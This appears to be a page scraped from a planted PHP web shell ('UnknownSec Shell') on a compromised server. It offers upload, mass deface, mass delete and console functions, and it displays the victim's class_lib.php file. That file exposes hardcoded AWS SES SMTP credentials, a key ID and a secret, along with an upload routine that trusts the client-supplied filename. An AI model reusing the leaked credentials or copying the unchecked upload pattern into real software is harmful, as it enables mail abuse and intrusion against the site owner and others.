shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/
includes
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
class_lib.php
<?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; /* * Libary of form object classes */ class Select_month { var $monthSelect; //== the select object output from the method //F=January, M=Jan public function __construct($objName, $F_or_M, $month, $nullValue, $javascript, $formName){ $this->monthSelect = "<select name='".$objName."' ".$javascript."> <option value=''>".$nullValue."</option>"; for($i=1; $i<=12; $i++){ $monTS = mktime(8,0,0,$i,1,date('Y')); $mon = date($F_or_M, $monTS); $this->monthSelect.= "<option value='".$i."'"; if ($month == $i){ $this->monthSelect.=" selected"; } $this->monthSelect.= ">".$mon."</option>"; } $this->monthSelect.= "</select>"; echo $this->monthSelect." "; } } class Select_date{ var $dateSelect; //==the select object output from the method public function __construct($objName, $date, $nullValue, $javascript, $formName){ $this->dateSelect = "<select name='".$objName."' ".$javascript."> <option value=''>".$nullValue."</option>"; for ($i=1; $i<=31; $i++){ $this->dateSelect .= "<option value='".$i."'"; if ($i == $date){ $this->dateSelect .= " selected"; } $this->dateSelect .= ">".$i."</option>"; } $this->dateSelect .= "</select>"; echo $this->dateSelect." "; } } class Select_year{ var $yearSelect; //=== the select object output from the method public function __construct($objName, $y1, $y2, $year, $nullValue, $javascript, $formName){ $this->yearSelect = "<select name='".$objName."' id='".$objName."' ".$javascript."> <option value=''>".$nullValue."</option>"; if ($y1 <= $y2){ for($i = $y1; $i <= $y2; $i++){ $this->yearSelect .= "<option value='".$i."'"; if ($i == $year){ $this->yearSelect .= " selected"; } $this->yearSelect .= ">".$i."</option>"; } } else { for($i = $y1; $i >= $y2; $i--){ $this->yearSelect .= "<option value='".$i."'"; if ($i == $year){ $this->yearSelect .= " selected"; } $this->yearSelect .= ">".$i."</option>"; } } $this->yearSelect .= "</select>"; echo $this->yearSelect; } } class Upload_File { public function __construct($fileObjName, $path, $newfilename){ $Template = new Template; if ($newfilename != ''){ $uploadfile = $path.$newfilename; } else { $uploadfile = $path.$_FILES[$fileObjName]['name']; } if (move_uploaded_file($_FILES[$fileObjName]['tmp_name'], $uploadfile)) { return true; } else { return false; } } } /* auto-generate email alert to admin param string return null */ class Send_Email { var $subject; var $message; public function __construct($sendto, $subject, $message){ $smtp_host = "email-smtp.us-east-1.amazonaws.com"; $smtp_user = "AKIAJXYZYI6TGC5FC2DQ"; $smtp_pass = "AskKUiknEnWjU+K+JnCeciKcT31bV5iDQPJJ+xOSqlgF"; require_once 'PHPMailer/src/Exception.php'; require_once 'PHPMailer/src/PHPMailer.php'; require_once 'PHPMailer/src/SMTP.php'; $mail = new PHPMailer(true); try { //Server settings // $mail->SMTPDebug = 2; // Enable verbose debug output $mail->isSMTP(); // Set mailer to use SMTP $mail->Host = $smtp_host; // Specify main and backup SMTP servers $mail->SMTPAuth = true; // Enable SMTP authentication $mail->Username = $smtp_user; // SMTP username $mail->Password = $smtp_pass; // SMTP password $mail->SMTPSecure = 'tls'; // Enable TLS encryption, `ssl` also accepted $mail->Port = 587; // TCP port to connect to //Recipients $mail->setFrom('info@delv-in.com', 'DEVLIN'); // Name is optional $mail->addAddress($sendto, ''); // Add a recipient // $mail->addBCC('info@delv-in.com'); //Attachments // $mail->addAttachment('/var/tmp/file.tar.gz'); // Add attachments // $mail->addAttachment('/tmp/image.jpg', 'new.jpg'); // Optional name //Content $mail->isHTML(true); // Set email format to HTML $mail->Subject = $subject; $mail->Body = $message; // $mail->AltBody = 'This is the body in plain text for non-HTML mail clients'; $mail->send(); return true; } catch (Exception $e) { return FALSE; } } }
© 2026 UnknownSec